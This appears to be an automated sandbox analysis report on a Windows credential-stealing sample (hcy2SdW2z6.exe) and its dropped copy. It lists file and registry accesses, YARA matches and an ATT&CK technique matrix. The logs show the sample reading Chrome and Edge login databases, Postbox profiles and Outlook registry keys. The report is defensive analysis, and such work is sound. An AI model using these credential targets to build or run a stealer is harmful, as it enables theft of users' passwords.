            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Users\user\Desktop\hcy2SdW2z6.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeQueries volume information: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Design\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Design.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeQueries volume information: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 9.2.zZlsXaceOG.exe.4511d18.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.zZlsXaceOG.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hcy2SdW2z6.exe.4a10c68.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hcy2SdW2z6.exe.4a31688.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.zZlsXaceOG.exe.44f12f8.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.zZlsXaceOG.exe.4511d18.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hcy2SdW2z6.exe.4a10c68.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.zZlsXaceOG.exe.44f12f8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.3639123759.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1277566601.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3644481905.0000000002D92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1236876601.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3644075067.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3644075067.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3644481905.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: hcy2SdW2z6.exe PID: 7704, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: hcy2SdW2z6.exe PID: 8176, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zZlsXaceOG.exe PID: 7440, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zZlsXaceOG.exe PID: 504, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara matchFile source: 9.2.zZlsXaceOG.exe.4511d18.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.zZlsXaceOG.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hcy2SdW2z6.exe.4a10c68.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hcy2SdW2z6.exe.4a31688.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.zZlsXaceOG.exe.44f12f8.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.zZlsXaceOG.exe.4511d18.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hcy2SdW2z6.exe.4a10c68.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.zZlsXaceOG.exe.44f12f8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.3639123759.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1277566601.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1236876601.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: hcy2SdW2z6.exe PID: 7704, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: hcy2SdW2z6.exe PID: 8176, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zZlsXaceOG.exe PID: 7440, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zZlsXaceOG.exe PID: 504, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 9.2.zZlsXaceOG.exe.4511d18.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.zZlsXaceOG.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hcy2SdW2z6.exe.4a10c68.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hcy2SdW2z6.exe.4a31688.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.zZlsXaceOG.exe.44f12f8.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.zZlsXaceOG.exe.4511d18.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hcy2SdW2z6.exe.4a10c68.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hcy2SdW2z6.exe.4a31688.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.zZlsXaceOG.exe.44f12f8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.3639123759.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1277566601.00000000044F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3644481905.0000000002D92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1236876601.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3644075067.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3644075067.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3644481905.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: hcy2SdW2z6.exe PID: 7704, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: hcy2SdW2z6.exe PID: 8176, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zZlsXaceOG.exe PID: 7440, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zZlsXaceOG.exe PID: 504, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Scheduled Task/Job
            1
            Scheduled Task/Job
            111
            Process Injection
            11
            Masquerading
            1
            OS Credential Dumping
            111
            Security Software Discovery
            Remote Services1
            Email Collection
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading
            1
            Scheduled Task/Job
            11
            Disable or Modify Tools
            LSASS Memory1
            Process Discovery
            Remote Desktop Protocol11
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            41
            Virtualization/Sandbox Evasion
            Security Account Manager41
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares1
            Data from Local System
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            System Network Configuration Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing
            DCSync23
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
